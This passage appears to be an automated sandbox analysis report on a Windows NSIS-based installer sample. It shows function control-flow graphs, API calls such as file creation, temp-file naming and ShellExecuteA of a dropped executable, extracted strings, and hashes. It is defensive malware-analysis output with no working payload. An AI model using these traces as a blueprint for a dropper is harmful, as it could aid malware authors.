            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Find$CloseFileFirst
            • String ID:
            • API String ID: 2295610775-0
            • Opcode ID: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
            • Instruction ID: 6bc8dc8487d68019062fb65c0caa7a5850599756ae9c65598668cc32d68c0862
            • Opcode Fuzzy Hash: 0ba34ad688579e7913e3aeb04dcfdbb9c24dd4cd636fec125d72bd6057fbbed4
            • Instruction Fuzzy Hash: C5D0123195D5309BD31017797C0C85B7A58DF293317108A33F025F22E0D3749C519AED
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 106 402c22-402c70 GetTickCount GetModuleFileNameA call 4056e3 109 402c72-402c77 106->109 110 402c7c-402caa call 405a0c call 405546 call 405a0c GetFileSize 106->110 111 402e54-402e58 109->111 118 402cb0 110->118 119 402d97-402da5 call 402bbe 110->119 120 402cb5-402ccc 118->120 125 402da7-402daa 119->125 126 402dfa-402dff 119->126 122 402cd0-402cd2 call 40307d 120->122 123 402cce 120->123 130 402cd7-402cd9 122->130 123->122 128 402dac-402dc4 call 4030af call 40307d 125->128 129 402dce-402df8 GlobalAlloc call 4030af call 402e5b 125->129 126->111 128->126 152 402dc6-402dcc 128->152 129->126 157 402e0b-402e1c 129->157 132 402e01-402e09 call 402bbe 130->132 133 402cdf-402ce6 130->133 132->126 136 402d62-402d66 133->136 137 402ce8-402cfc call 4056a4 133->137 141 402d70-402d76 136->141 142 402d68-402d6f call 402bbe 136->142 137->141 155 402cfe-402d05 137->155 148 402d85-402d8f 141->148 149 402d78-402d82 call 405d9a 141->149 142->141 148->120 156 402d95 148->156 149->148 152->126 152->129 155->141 161 402d07-402d0e 155->161 156->119 158 402e24-402e29 157->158 159 402e1e 157->159 162 402e2a-402e30 158->162 159->158 161->141 163 402d10-402d17 161->163 162->162 164 402e32-402e4d SetFilePointer call 4056a4 162->164 163->141 165 402d19-402d20 163->165 168 402e52 164->168 165->141 167 402d22-402d42 165->167 167->126 169 402d48-402d4c 167->169 168->111 170 402d54-402d5c 169->170 171 402d4e-402d52 169->171 170->141 172 402d5e-402d60 170->172 171->156 171->170 172->141
            APIs
            • GetTickCount.KERNEL32("C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,00000000), ref: 00402C33
            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Hu25VEa8Dr.exe,00000400), ref: 00402C4F
              • Part of subcall function 004056E3: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 004056E7
              • Part of subcall function 004056E3: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709
            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hu25VEa8Dr.exe,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 00402C9B
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
            • Inst, xrefs: 00402D07
            • C:\Users\user\Desktop\Hu25VEa8Dr.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C
            • Error launching installer, xrefs: 00402C72
            • Null, xrefs: 00402D19
            • C:\Users\user\Desktop, xrefs: 00402C7D, 00402C82, 00402C88
            • "C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 00402C2C
            • soft, xrefs: 00402D10
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: File$AttributesCountCreateModuleNameSizeTick
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hu25VEa8Dr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
            • API String ID: 4283519449-595648611
            • Opcode ID: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
            • Instruction ID: 5cdc40c0d59b83eec34e45f83230a383a342561faf5f4e8ee161a7b3089b1b43
            • Opcode Fuzzy Hash: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
            • Instruction Fuzzy Hash: 40512371A00214ABDB20DF61DE89B9E7BA8EF04329F10413BF905B62D1D7BC9D418B9D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 242 402e5b-402e6f 243 402e71 242->243 244 402e78-402e81 242->244 243->244 245 402e83 244->245 246 402e8a-402e8f 244->246 245->246 247 402e91-402e9a call 4030af 246->247 248 402e9f-402eac call 40307d 246->248 247->248 252 402eb2-402eb6 248->252 253 403028 248->253 254 403011-403013 252->254 255 402ebc-402f05 GetTickCount 252->255 256 40302a-40302b 253->256 260 403015-403018 254->260 261 403068-40306c 254->261 257 403073 255->257 258 402f0b-402f13 255->258 259 403076-40307a 256->259 257->259 264 402f15 258->264 265 402f18-402f26 call 40307d 258->265 262 40301a 260->262 263 40301d-403026 call 40307d 260->263 266 40302d-403033 261->266 267 40306e 261->267 262->263 263->253 275 403070 263->275 264->265 265->253 276 402f2c-402f35 265->276 270 403035 266->270 271 403038-403046 call 40307d 266->271 267->257 270->271 271->253 279 403048-40305b WriteFile 271->279 275->257 278 402f3b-402f5b call 405e08 276->278 285 402f61-402f74 GetTickCount 278->285 286 403009-40300b 278->286 281 40300d-40300f 279->281 282 40305d-403060 279->282 281->256 282->281 284 403062-403065 282->284 284->261 287 402f76-402f7e 285->287 288 402fb9-402fbd 285->288 286->256 291 402f80-402f84 287->291 292 402f86-402fb6 MulDiv wsprintfA call 404daa 287->292 289 402ffe-403001 288->289 290 402fbf-402fc2 288->290 289->258 296 403007 289->296 294 402fe4-402fef 290->294 295 402fc4-402fd8 WriteFile 290->295 291->288 291->292 292->288 299 402ff2-402ff6 294->299 295->281 298 402fda-402fdd 295->298 296->257 298->281 300 402fdf-402fe2 298->300 299->278 301 402ffc 299->301 300->299 301->257
            APIs
            • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EC2
            • GetTickCount.KERNEL32(a\A,00414B88,00004000), ref: 00402F69
            • MulDiv.KERNEL32 ref: 00402F92
            • wsprintfA.USER32 ref: 00402FA2
            • WriteFile.KERNELBASE(00000000,00000000,0041DB88,7FFFFFFF,00000000), ref: 00402FD0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$a\A
            • API String ID: 4209647438-1826951565
            • Opcode ID: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
            • Instruction ID: 0d39cdfb2b20f01ea0ef459ff81ac6f09524c508dd7874cbed1e127a204ff5ac
            • Opcode Fuzzy Hash: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
            • Instruction Fuzzy Hash: 3D618D7190121AEBDF10CF65DA44A9E7BB8EF04366F10413BF800B72D4D7789A51DBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 302 401734-401757 call 4029f6 call 40556c 307 401761-401773 call 405a0c call 4054ff lstrcatA 302->307 308 401759-40175f call 405a0c 302->308 313 401778-40177e call 405c6e 307->313 308->313 318 401783-401787 313->318 319 401789-401793 call 405d07 318->319 320 4017ba-4017bd 318->320 327 4017a5-4017b7 319->327 328 401795-4017a3 CompareFileTime 319->328 322 4017c5-4017e1 call 4056e3 320->322 323 4017bf-4017c0 call 4056c4 320->323 330 4017e3-4017e6 322->330 331 401859-401882 call 404daa call 402e5b 322->331 323->322 327->320 328->327 332 4017e8-40182a call 405a0c * 2 call 405a2e call 405a0c call 4052cd 330->332 333 40183b-401845 call 404daa 330->333 345 401884-401888 331->345 346 40188a-401896 SetFileTime 331->346 332->318 366 401830-401831 332->366 343 40184e-401854 333->343 347 402894 343->347 345->346 349 40189c-4018a7 CloseHandle 345->349 346->349 350 402896-40289a 347->350 352 40288b-40288e 349->352 353 4018ad-4018b0 349->353 352->347 355 4018b2-4018c3 call 405a2e lstrcatA 353->355 356 4018c5-4018c8 call 405a2e 353->356 360 4018cd-402213 call 4052cd 355->360 356->360 360->350 369 40265c-402663 360->369 366->343 368 401833-401834 366->368 368->333 369->352
            APIs
            • lstrcatA.KERNEL32(00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
            • CompareFileTime.KERNEL32(-00000014,?,00409B80,00409B80,00000000,00000000,00409B80,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
              • Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
              • Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
              • Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$fd $open Sahofivizu.exe
            • API String ID: 1941528284-1568267452
            • Opcode ID: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
            • Instruction ID: 2412d90e5cc6ef50ac46e2462e63b4f26081636668b1d4f665875a47291bc265
            • Opcode Fuzzy Hash: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
            • Instruction Fuzzy Hash: 4341D831A10515BACF10BBB5DD86DAF3A69EF41328B24433BF511F11E2D67C4A418E6D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 370 4015b3-4015c6 call 4029f6 call 405593 375 4015c8-4015e3 call 40552a CreateDirectoryA 370->375 376 40160a-40160d 370->376 383 401600-401608 375->383 384 4015e5-4015f0 GetLastError 375->384 378 40162d-402169 call 401423 376->378 379 40160f-401628 call 401423 call 405a0c SetCurrentDirectoryA 376->379 391 40288b-40289a 378->391 379->391 383->375 383->376 388 4015f2-4015fb GetFileAttributesA 384->388 389 4015fd 384->389 388->383 388->389 389->383
            APIs
              • Part of subcall function 00405593: CharNextA.USER32(ES@), ref: 004055A1
              • Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055A6
              • Part of subcall function 00405593: CharNextA.USER32(00000000), ref: 004055B5
            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-2935972921
            • Opcode ID: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
            • Instruction ID: bf1eb0eabc3c1df6ff2fb323ed3efcd7168262dea338722757ad05095e7f5395
            • Opcode Fuzzy Hash: 360e2cbe79de91032a44b72a5c5ff191f5bd6e6521d3b477c7bacda235078696
            • Instruction Fuzzy Hash: AB012631908180AFDB217F756D449BF6BB0EA56365728073FF492B22E2C23C4D42962E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 395 405712-40571c 396 40571d-405747 GetTickCount GetTempFileNameA 395->396 397 405756-405758 396->397 398 405749-40574b 396->398 400 405750-405753 397->400 398->396 399 40574d 398->399 399->400
            APIs
            • GetTickCount.KERNEL32("C:\Users\user\Desktop\Hu25VEa8Dr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004030F8,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405725
            • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 0040573F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$C:\Users\user\AppData\Local\Temp\$nsa
            • API String ID: 1716503409-2798350797
            • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
            • Instruction ID: 857343acb9398127b83b67a88284cb3acf20d602f6beb627bdaaa73bf87bc8f8
            • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
            • Instruction Fuzzy Hash: 19F0A736348204BAE7105E55DC04B9B7F99DFD1750F14C027F9449B1C0D6F099589BA9
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            APIs
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
              • Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8
            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 004030E7
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
            • API String ID: 4115351271-1176120985
            • Opcode ID: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
            • Instruction ID: 7f1b43601f0a10077d0081c2ba5ec5825ac71a1bded9547d22d949ebda8a6a9f
            • Opcode Fuzzy Hash: 9fc94c8ce289ceace51d82d7694160c71b26e7ee5232ad3accb455f1d4d4e313
            • Instruction Fuzzy Hash: B6D0922150AD3031D651322A3E06BCF154D8F4636AF65807BF944B608A4A6C2A825AEE
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 416 401dc1-401e10 call 4029f6 * 4 call 401423 ShellExecuteA 427 401e16-402663 416->427 428 40288b-40289a 416->428 427->428
            APIs
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E07
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401DF2
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ExecuteShell
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 587946157-2935972921
            • Opcode ID: 3dc99a1e9f4d2a7ff469985d076f4f0b18b0b581c00dd406e6359dc7570937ce
            • Instruction ID: 1d9e37e4724715ff8eb4cd61c52570f4e17590a8471f76494d0d603f05069ab9
            • Opcode Fuzzy Hash: 3dc99a1e9f4d2a7ff469985d076f4f0b18b0b581c00dd406e6359dc7570937ce
            • Instruction Fuzzy Hash: C3F04C73B04301AACB50AFB19D4AE5E3BA8AB41398F200637F510F70C1D9FC8801B318
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 432 4023af-4023b4 call 402b00 434 4023b9-4023c6 call 4029f6 432->434 437 40265c-402663 434->437 438 4023cc-4023ea RegQueryValueExA 434->438 439 40288b-40289a 437->439 440 402420-402425 438->440 441 4023ec-4023f0 438->441 445 40247c-402483 RegCloseKey 440->445 443 4023f2-4023f5 441->443 444 40240b-40241e call 40596a 441->444 447 4023f7-4023fb 443->447 448 4023fd-402409 443->448 444->445 445->439 447->440 447->448 448->445
            APIs
              • Part of subcall function 00402B00: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28
            • RegQueryValueExA.ADVAPI32 ref: 004023DF
            • RegCloseKey.ADVAPI32(?), ref: 0040247D
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID:
            • API String ID: 3677997916-0
            • Opcode ID: c895cf90978fe9ef530acde7783083059366b6ad1ee30967e7d08bcc3b791e82
            • Instruction ID: b014844320ad767dada11dd3629d5dc4f3fca22d365999f113298c01dbc1c66c
            • Opcode Fuzzy Hash: c895cf90978fe9ef530acde7783083059366b6ad1ee30967e7d08bcc3b791e82
            • Instruction Fuzzy Hash: B011C471904205EFDB15DF64CA889AE7BB4EF14348F20807FE442B72C1D2B88A45EB5A
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 452 401389-40138e 453 4013fa-4013fc 452->453 454 401390-4013a0 453->454 455 4013fe 453->455 454->455 457 4013a2-4013a3 call 401434 454->457 456 401400-401401 455->456 459 4013a8-4013ad 457->459 460 401404-401409 459->460 461 4013af-4013b7 call 40136d 459->461 460->456 464 4013b9-4013bb 461->464 465 4013bd-4013c2 461->465 466 4013c4-4013c9 464->466 465->466 466->453 467 4013cb-4013f4 MulDiv SendMessageA 466->467 467->453
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
            • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
            • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
            • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 468 4056e3-40570f GetFileAttributesA CreateFileA
            APIs
            • GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\Hu25VEa8Dr.exe,80000000,00000003), ref: 004056E7
            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
